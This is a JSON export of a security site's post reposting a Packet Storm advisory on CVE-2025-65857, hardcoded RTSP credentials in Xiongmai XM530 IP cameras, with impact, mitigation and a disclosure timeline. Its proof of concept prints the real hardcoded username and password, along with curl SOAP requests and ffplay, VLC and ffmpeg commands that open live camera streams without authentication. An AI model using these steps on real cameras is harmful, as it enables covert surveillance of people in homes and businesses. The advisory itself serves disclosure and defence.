{"id":31886,"date":"2025-12-18T11:45:23","date_gmt":"2025-12-18T11:45:23","guid":{"rendered":"http:\/\/localhost\/?p=31886"},"modified":"2025-12-18T11:45:23","modified_gmt":"2025-12-18T11:45:23","slug":"xiongmai-xm530-ip-camera-hardcoded-rtsp-credential-exposure","status":"publish","type":"post","link":"https:\/\/zero.redgem.net\/?p=31886","title":{"rendered":"\ud83d\udcc4 Xiongmai XM530 IP Camera Hardcoded RTSP Credential Exposure_PACKETSTORM:213043"},"content":{"rendered":"<p>{&#8220;lastseen&#8221;:&#8221;2025-12-18T16:35:09&#8243;,&#8221;description&#8221;:&#8221;The GetStreamUri ONVIF endpoint in Xiongmai XM530-series IP cameras exposes RTSP URIs containing hardcoded credentials, enabling direct unauthorized access to live video streams&#8230;&#8221;,&#8221;published&#8221;:&#8221;2025-12-18T00:00:00&#8243;,&#8221;modified&#8221;:&#8221;2025-12-18T00:00:00&#8243;,&#8221;type&#8221;:&#8221;packetstorm&#8221;,&#8221;title&#8221;:&#8221;\ud83d\udcc4 Xiongmai XM530 IP Camera Hardcoded RTSP Credential Exposure&#8221;,&#8221;source&#8221;:&#8221;&#8221;,&#8221;references&#8221;:&#8221;&#8221;,&#8221;id&#8221;:&#8221;PACKETSTORM:213043&#8243;,&#8221;bulletinFamily&#8221;:&#8221;exploit&#8221;,&#8221;cwe&#8221;:null,&#8221;cvelist&#8221;:[&#8220;CVE-2017-16725&#8243;,&#8221;CVE-2018-10088&#8243;,&#8221;CVE-2018-17915&#8243;,&#8221;CVE-2018-6830&#8243;,&#8221;CVE-2025-65856&#8243;,&#8221;CVE-2025-65857&#8243;],&#8221;sourceData&#8221;:&#8221;# CVE-2025-65857\\n    \\n    **Xiongmai XM530 IP Camera Hardcoded RTSP Credentials Exposure**\\n    \\n    &#8212;\\n    \\n    ## Summary\\n    \\n    The GetStreamUri ONVIF endpoint in Xiongmai XM530-series IP cameras exposes RTSP URIs containing hardcoded credentials, enabling direct unauthorized access to live video streams.\\n    \\n    **CVE ID:** CVE-2025-65857  \\n    **Severity:** CRITICAL  \\n    **CVSS v3.1 Score:** 9.1  \\n    **CVSS Vector:** `CVSS:3.1\/AV:N\/AC:L\/PR:N\/UI:N\/S:U\/C:H\/I:N\/A:H`\\n    \\n    ### CVSS Breakdown\\n    \\n    * **Attack Vector (AV):** Network &#8211; Remotely exploitable\\n    * **Attack Complexity (AC):** Low &#8211; Credentials hardcoded in all devices\\n    * **Privileges Required (PR):** None &#8211; Accessible via CVE-2025-65856\\n    * **User Interaction (UI):** None &#8211; Zero-click exploitation\\n    * **Confidentiality:** High &#8211; Complete video stream access\\n    * **Integrity:** None &#8211; Read-only credential exposure\\n    * **Availability:** High &#8211; Potential DoS via stream exhaustion\\n    \\n    &#8212;\\n    \\n    ## Affected Products\\n    \\n    **Vendor:** Hangzhou Xiongmai Technology Co., Ltd.  \\n    **Product:** IP Camera XM530V200_X6-WEQ_8M  \\n    **Commercial Brand:** ANBIUX (and hundreds of OEM rebrands)  \\n    **Firmware:** V5.00.R02.000807D8.10010.346624.S.ONVIF 21.06 and likely all V5.00.R02.* versions  \\n    **Component:** ONVIF Media Service &#8211; GetStreamUri endpoint\\n    \\n    **Device Context:**  \\n    Xiongmai is a major OEM supplier of IP cameras sold under hundreds of brand names globally. These cameras are widely deployed in residential, commercial, and industrial surveillance systems.\\n    \\n    &#8212;\\n    \\n    ## Vulnerability Details\\n    \\n    The `GetStreamUri` ONVIF endpoint returns RTSP URIs with hardcoded credentials embedded directly in the URL.\\n    \\n    **Technical Details:**\\n    \\n    1. **Hard-coded Credentials (CWE-798)**\\n       * Username: `wphd`\\n       * Password: `2MNswbQ5`\\n       * Identical across all tested devices\\n       * Do not change when admin password is modified\\n    \\n    2. **Insufficiently Protected Credentials (CWE-522)**\\n       * Credentials transmitted in plaintext over HTTP\\n       * Embedded in URI format: `rtsp:\/\/[IP]:554\/user=wphd_password=2MNswbQ5_channel=0_stream=0\\u0026onvif=0.sdp?real_stream`\\n       * No encryption or obfuscation\\n    \\n    3. **Combined with CVE-2025-65856:**\\n       * GetStreamUri endpoint accessible without authentication\\n       * Complete zero-click access to live video streams\\n       * No authentication barriers whatsoever\\n    \\n    &#8212;\\n    \\n    ## Impact\\n    \\n    An unauthenticated remote attacker can:\\n    \\n    * Obtain RTSP credentials via unauthenticated ONVIF request\\n    * Access live video and audio streams directly\\n    * Monitor surveillance feeds in real-time\\n    * Perform mass surveillance (credentials work across all devices)\\n    * Violate privacy of camera subjects\\n    \\n    **Privacy Impact:** \\n    * Critical violation of GDPR and privacy regulations\\n    * Enables targeted surveillance and stalking\\n    * Mass surveillance operations feasible\\n    * No user notification of unauthorized access\\n    \\n    **Real-world Scenarios:**\\n    * Home surveillance cameras monitored by strangers\\n    * Business security feeds accessible to competitors\\n    * Residential privacy completely compromised\\n    \\n    &#8212;\\n    \\n    ## Proof of Concept\\n    \\n    **Step 1: Obtain Valid Profile Tokens (No Authentication Required)**\\n    \\n    &#8220;`bash\\n    curl -X POST http:\/\/[CAMERA_IP]:8899\/onvif\/device_service \\\\\\n      -H \\&#8221;Content-Type: application\/soap+xml\\&#8221; \\\\\\n      -d &#8216;\\u003c?xml version=\\&#8221;1.0\\&#8221; encoding=\\&#8221;UTF-8\\&#8221;?\\u003e\\n    \\u003cs:Envelope xmlns:s=\\&#8221;http:\/\/www.w3.org\/2003\/05\/soap-envelope\\&#8221;\\u003e\\n      \\u003cs:Body xmlns:trt=\\&#8221;http:\/\/www.onvif.org\/ver10\/media\/wsdl\\&#8221;\\u003e\\n        \\u003ctrt:GetProfiles\/\\u003e\\n      \\u003c\/s:Body\\u003e\\n    \\u003c\/s:Envelope\\u003e&#8217;\\n    &#8220;`\\n    \\n    **Response includes available profiles:**\\n    &#8211; Token `000` &#8211; mainStream (3200&#215;1800 H264)\\n    &#8211; Token `001` &#8211; subStream (800&#215;448 H264)\\n    &#8211; Token `002` &#8211; snapStream (800&#215;448 JPEG)\\n    \\n    **Step 2: Extract RTSP URI with Hardcoded Credentials**\\n    \\n    &#8220;`bash\\n    curl -X POST http:\/\/[CAMERA_IP]:8899\/onvif\/Media \\\\\\n      -H \\&#8221;Content-Type: application\/soap+xml\\&#8221; \\\\\\n      -d &#8216;\\u003c?xml version=\\&#8221;1.0\\&#8221; encoding=\\&#8221;UTF-8\\&#8221;?\\u003e\\n    \\u003cs:Envelope xmlns:s=\\&#8221;http:\/\/www.w3.org\/2003\/05\/soap-envelope\\&#8221;\\u003e\\n      \\u003cs:Body xmlns:trt=\\&#8221;http:\/\/www.onvif.org\/ver10\/media\/wsdl\\&#8221;\\u003e\\n        \\u003ctrt:GetStreamUri\\u003e\\n          \\u003ctrt:StreamSetup\\u003e\\n            \\u003ctt:Stream xmlns:tt=\\&#8221;http:\/\/www.onvif.org\/ver10\/schema\\&#8221;\\u003eRTP-Unicast\\u003c\/tt:Stream\\u003e\\n            \\u003ctt:Transport xmlns:tt=\\&#8221;http:\/\/www.onvif.org\/ver10\/schema\\&#8221;\\u003e\\n              \\u003ctt:Protocol\\u003eRTSP\\u003c\/tt:Protocol\\u003e\\n            \\u003c\/tt:Transport\\u003e\\n          \\u003c\/trt:StreamSetup\\u003e\\n          \\u003ctrt:ProfileToken\\u003e000\\u003c\/trt:ProfileToken\\u003e\\n        \\u003c\/trt:GetStreamUri\\u003e\\n      \\u003c\/s:Body\\u003e\\n    \\u003c\/s:Envelope\\u003e&#8217;\\n    &#8220;`\\n    \\n    **Response exposes hardcoded credentials:**\\n    &#8220;`xml\\n    \\u003ctt:Uri\\u003ertsp:\/\/[CAMERA_IP]:554\/user=wphd_password=2MNswbQ5_channel=0_stream=0\\u0026onvif=0.sdp?real_stream\\u003c\/tt:Uri\\u003e\\n    &#8220;`\\n    \\n    **Step 3: Access Video Stream Directly**\\n    \\n    &#8220;`bash\\n    # Using ffplay\\n    ffplay \\&#8221;rtsp:\/\/[CAMERA_IP]:554\/user=wphd_password=2MNswbQ5_channel=0_stream=0\\u0026onvif=0.sdp?real_stream\\&#8221;\\n    \\n    # Using VLC\\n    vlc \\&#8221;rtsp:\/\/[CAMERA_IP]:554\/user=wphd_password=2MNswbQ5_channel=0_stream=0\\u0026onvif=0.sdp?real_stream\\&#8221;\\n    \\n    # Using ffmpeg (recording)\\n    ffmpeg -i \\&#8221;rtsp:\/\/[CAMERA_IP]:554\/user=wphd_password=2MNswbQ5_channel=0_stream=0\\u0026onvif=0.sdp?real_stream\\&#8221; -c copy output.mp4\\n    &#8220;`\\n    \\n    **Result:** Complete access to live video stream with zero authentication in three simple steps.\\n    \\n    &#8212;\\n    \\n    ## Mitigation\\n    \\n    ### For Users (Immediate):\\n    \\n    * **Network Isolation:** Place cameras on isolated VLAN with no internet access\\n    * **Firewall Rules:** Block all inbound connections to RTSP port 554\\n    * **VPN-Only Access:** Never expose cameras directly to internet\\n    * **Monitor RTSP Connections:** Log and alert on unexpected RTSP sessions\\n    * **Consider Replacement:** Given vendor&#8217;s security history, replacement strongly recommended\\n    \\n    ### For Vendor:\\n    \\n    * Remove hardcoded credentials from RTSP URIs\\n    * Implement RTSP Digest Authentication (RFC 2617)\\n    * Use session tokens with expiration\\n    * Generate unique credentials per device\\n    * Implement rate limiting on RTSP connections\\n    \\n    **No patch currently available.**\\n    \\n    &#8212;\\n    \\n    \\n    ## Timeline\\n    \\n    * **November 2025:** Vulnerability discovered during security assessment\\n    * **December 16, 2025:** CVE-2025-65857 assigned by MITRE\\n    * **December 17, 2025:** Vendor contact attempted via XMSRC@xiongmaitech.com (email delivery failed &#8211; server misconfigured)\\n    * **December 17, 2025:** Alternative contact attempted via oversea_sales@xiongmaitech.com (email delivery failed)\\n    * **December 18, 2025:** Public disclosure\\n    \\n    **Vendor Response:** No response received. Official security contact infrastructure non-functional.\\n    \\n    &#8212;\\n    \\n    ## Credits\\n    \\n    **Discovered by:** Luis Miranda Acebedo  \\n    **Location:** Vigo, Galicia, Spain  \\n    **Contact:** luis.miranda.acebedo@gmail.com\\n    \\n    &#8212;\\n    \\n    ## References\\n    \\n    * **CVE:** https:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2025-65857\\n    * **Related:** CVE-2025-65856 (ONVIF Authentication Bypass)\\n    * **CWE-798:** https:\/\/cwe.mitre.org\/data\/definitions\/798.html\\n    * **CWE-522:** https:\/\/cwe.mitre.org\/data\/definitions\/522.html\\n    * **RTSP RFC 2326:** https:\/\/tools.ietf.org\/html\/rfc2326\\n    * **Similar CVE:** CVE-2018-6830 (Foscam &#8211; Similar RTSP credential exposure)\\n    * **Vendor History:**\\n      * CVE-2017-16725 (Directory traversal, unpatched)\\n      * CVE-2018-10088 (Authentication bypass, unpatched)\\n      * CVE-2018-17915, 17917, 17919 (XMEye P2P vulnerabilities)\\n      * Mirai botnet contributor (2016)\\n      * SEC Consult Advisory (2018): \\&#8221;Recommend discontinuing Xiongmai products\\&#8221;\\n    \\n    This site is open source. [Improve this page](https:\/\/github.com\/LuisMirandaAcebedo\/CVE-2025-65857\/edit\/main\/README.md).&#8221;,&#8221;sourceHref&#8221;:&#8221;https:\/\/packetstorm.news\/download\/213043&#8243;,&#8221;cvss&#8221;:{&#8220;score&#8221;:10,&#8221;severity&#8221;:&#8221;HIGH&#8221;,&#8221;vector&#8221;:&#8221;AV:N\/AC:L\/Au:N\/C:C\/I:C\/A:C&#8221;,&#8221;version&#8221;:&#8221;2.0&#8243;},&#8221;cvss2&#8243;:{},&#8221;cvss3&#8243;:{&#8220;version&#8221;:&#8221;&#8221;,&#8221;vectorString&#8221;:&#8221;&#8221;,&#8221;baseScore&#8221;:0,&#8221;baseSeverity&#8221;:&#8221;&#8221;,&#8221;attackVector&#8221;:&#8221;&#8221;,&#8221;attackComplexity&#8221;:&#8221;&#8221;,&#8221;privilegesRequired&#8221;:&#8221;&#8221;,&#8221;userInteraction&#8221;:&#8221;&#8221;,&#8221;scope&#8221;:&#8221;&#8221;,&#8221;confidentialityImpact&#8221;:&#8221;&#8221;,&#8221;integrityImpact&#8221;:&#8221;&#8221;,&#8221;availabilityImpact&#8221;:&#8221;&#8221;,&#8221;cvssV3&#8243;:{&#8220;version&#8221;:&#8221;3.0&#8243;,&#8221;vectorString&#8221;:&#8221;CVSS:3.0\/AV:N\/AC:L\/PR:N\/UI:N\/S:U\/C:H\/I:H\/A:H&#8221;,&#8221;baseScore&#8221;:9.8,&#8221;baseSeverity&#8221;:&#8221;CRITICAL&#8221;,&#8221;attackVector&#8221;:&#8221;NETWORK&#8221;,&#8221;attackComplexity&#8221;:&#8221;LOW&#8221;,&#8221;privilegesRequired&#8221;:&#8221;NONE&#8221;,&#8221;userInteraction&#8221;:&#8221;NONE&#8221;,&#8221;scope&#8221;:&#8221;UNCHANGED&#8221;,&#8221;confidentialityImpact&#8221;:&#8221;HIGH&#8221;,&#8221;integrityImpact&#8221;:&#8221;HIGH&#8221;,&#8221;availabilityImpact&#8221;:&#8221;HIGH&#8221;}},&#8221;href&#8221;:&#8221;https:\/\/packetstorm.news\/files\/id\/213043\/&#8221;,&#8221;category_name&#8221;:&#8221;Exploit&#8221;,&#8221;post_link&#8221;:&#8221;&#8221;,&#8221;product&#8221;:&#8221;&#8221;,&#8221;version&#8221;:&#8221;&#8221;,&#8221;vendor&#8221;:&#8221;&#8221;,&#8221;ai_description&#8221;:&#8221;&#8221;,&#8221;ai_severity&#8221;:&#8221;&#8221;,&#8221;ai_vendor&#8221;:&#8221;&#8221;,&#8221;ai_product&#8221;:&#8221;&#8221;,&#8221;ai_version&#8221;:&#8221;&#8221;,&#8221;ai_score&#8221;:0}<\/p>\n","protected":false},"excerpt":{"rendered":"<p>{&#8220;lastseen&#8221;:&#8221;2025-12-18T16:35:09&#8243;,&#8221;description&#8221;:&#8221;The GetStreamUri ONVIF endpoint in Xiongmai XM530-series IP cameras exposes RTSP URIs containing hardcoded credentials, enabling direct unauthorized access to live video streams&#8230;&#8221;,&#8221;published&#8221;:&#8221;2025-12-18T00:00:00&#8243;,&#8221;modified&#8221;:&#8221;2025-12-18T00:00:00&#8243;,&#8221;type&#8221;:&#8221;packetstorm&#8221;,&#8221;title&#8221;:&#8221;\ud83d\udcc4 Xiongmai XM530&#8230;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[6,8,36,12,15,13,53,7,11,5],"class_list":["post-31886","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-cve","tag-cvss","tag-cvss-100","tag-exploit","tag-high","tag-news","tag-packetstorm","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.5 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>\ud83d\udcc4 Xiongmai XM530 IP Camera Hardcoded RTSP Credential Exposure_PACKETSTORM:213043 - zero redgem<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/zero.redgem.net\/?p=31886\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"\ud83d\udcc4 Xiongmai XM530 IP Camera Hardcoded RTSP Credential Exposure_PACKETSTORM:213043 - zero redgem\" \/>\n<meta property=\"og:description\" content=\"{&#8220;lastseen&#8221;:&#8221;2025-12-18T16:35:09&#8243;,&#8221;description&#8221;:&#8221;The GetStreamUri ONVIF endpoint in Xiongmai XM530-series IP cameras exposes RTSP URIs containing hardcoded credentials, enabling direct unauthorized access to live video streams&#8230;&#8221;,&#8221;published&#8221;:&#8221;2025-12-18T00:00:00&#8243;,&#8221;modified&#8221;:&#8221;2025-12-18T00:00:00&#8243;,&#8221;type&#8221;:&#8221;packetstorm&#8221;,&#8221;title&#8221;:&#8221;\ud83d\udcc4 Xiongmai XM530...\" \/>\n<meta property=\"og:url\" content=\"https:\/\/zero.redgem.net\/?p=31886\" \/>\n<meta property=\"og:site_name\" content=\"zero redgem\" \/>\n<meta property=\"article:published_time\" content=\"2025-12-18T11:45:23+00:00\" \/>\n<meta name=\"author\" content=\"invoker\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"invoker\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"7 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=31886#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=31886\"},\"author\":{\"name\":\"invoker\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\"},\"headline\":\"\ud83d\udcc4 Xiongmai XM530 IP Camera Hardcoded RTSP Credential Exposure_PACKETSTORM:213043\",\"datePublished\":\"2025-12-18T11:45:23+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=31886\"},\"wordCount\":1367,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"keywords\":[\"CVE\",\"CVSS\",\"CVSS-10.0\",\"exploit\",\"HIGH\",\"news\",\"packetstorm\",\"Security\",\"tapic\",\"Vulnerability\"],\"articleSection\":[\"category_exploit\"],\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=31886#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=31886\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?p=31886\",\"name\":\"\ud83d\udcc4 Xiongmai XM530 IP Camera Hardcoded RTSP Credential Exposure_PACKETSTORM:213043 - zero redgem\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\"},\"datePublished\":\"2025-12-18T11:45:23+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=31886#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=31886\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=31886#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/zero.redgem.net\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"\ud83d\udcc4 Xiongmai XM530 IP Camera Hardcoded RTSP Credential Exposure_PACKETSTORM:213043\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"name\":\"zero redgem\",\"description\":\"\",\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/zero.redgem.net\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\",\"name\":\"zero redgem\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"\",\"contentUrl\":\"\",\"width\":191,\"height\":188,\"caption\":\"zero redgem\"},\"image\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\"}},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\",\"name\":\"invoker\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"caption\":\"invoker\"},\"sameAs\":[\"https:\\\/\\\/zero.redgem.net\"],\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?author=1\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"\ud83d\udcc4 Xiongmai XM530 IP Camera Hardcoded RTSP Credential Exposure_PACKETSTORM:213043 - zero redgem","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/zero.redgem.net\/?p=31886","og_locale":"en_US","og_type":"article","og_title":"\ud83d\udcc4 Xiongmai XM530 IP Camera Hardcoded RTSP Credential Exposure_PACKETSTORM:213043 - zero redgem","og_description":"{&#8220;lastseen&#8221;:&#8221;2025-12-18T16:35:09&#8243;,&#8221;description&#8221;:&#8221;The GetStreamUri ONVIF endpoint in Xiongmai XM530-series IP cameras exposes RTSP URIs containing hardcoded credentials, enabling direct unauthorized access to live video streams&#8230;&#8221;,&#8221;published&#8221;:&#8221;2025-12-18T00:00:00&#8243;,&#8221;modified&#8221;:&#8221;2025-12-18T00:00:00&#8243;,&#8221;type&#8221;:&#8221;packetstorm&#8221;,&#8221;title&#8221;:&#8221;\ud83d\udcc4 Xiongmai XM530...","og_url":"https:\/\/zero.redgem.net\/?p=31886","og_site_name":"zero redgem","article_published_time":"2025-12-18T11:45:23+00:00","author":"invoker","twitter_card":"summary_large_image","twitter_misc":{"Written by":"invoker","Est. reading time":"7 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/zero.redgem.net\/?p=31886#article","isPartOf":{"@id":"https:\/\/zero.redgem.net\/?p=31886"},"author":{"name":"invoker","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca"},"headline":"\ud83d\udcc4 Xiongmai XM530 IP Camera Hardcoded RTSP Credential Exposure_PACKETSTORM:213043","datePublished":"2025-12-18T11:45:23+00:00","mainEntityOfPage":{"@id":"https:\/\/zero.redgem.net\/?p=31886"},"wordCount":1367,"commentCount":0,"publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"keywords":["CVE","CVSS","CVSS-10.0","exploit","HIGH","news","packetstorm","Security","tapic","Vulnerability"],"articleSection":["category_exploit"],"inLanguage":"en-US","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/zero.redgem.net\/?p=31886#respond"]}]},{"@type":"WebPage","@id":"https:\/\/zero.redgem.net\/?p=31886","url":"https:\/\/zero.redgem.net\/?p=31886","name":"\ud83d\udcc4 Xiongmai XM530 IP Camera Hardcoded RTSP Credential Exposure_PACKETSTORM:213043 - zero redgem","isPartOf":{"@id":"https:\/\/zero.redgem.net\/#website"},"datePublished":"2025-12-18T11:45:23+00:00","breadcrumb":{"@id":"https:\/\/zero.redgem.net\/?p=31886#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/zero.redgem.net\/?p=31886"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/zero.redgem.net\/?p=31886#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/zero.redgem.net\/"},{"@type":"ListItem","position":2,"name":"\ud83d\udcc4 Xiongmai XM530 IP Camera Hardcoded RTSP Credential Exposure_PACKETSTORM:213043"}]},{"@type":"WebSite","@id":"https:\/\/zero.redgem.net\/#website","url":"https:\/\/zero.redgem.net\/","name":"zero redgem","description":"","publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/zero.redgem.net\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/zero.redgem.net\/#organization","name":"zero redgem","url":"https:\/\/zero.redgem.net\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/","url":"","contentUrl":"","width":191,"height":188,"caption":"zero redgem"},"image":{"@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/"}},{"@type":"Person","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca","name":"invoker","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","caption":"invoker"},"sameAs":["https:\/\/zero.redgem.net"],"url":"https:\/\/zero.redgem.net\/?author=1"}]}},"_links":{"self":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/31886","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=31886"}],"version-history":[{"count":0,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/31886\/revisions"}],"wp:attachment":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=31886"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=31886"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=31886"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}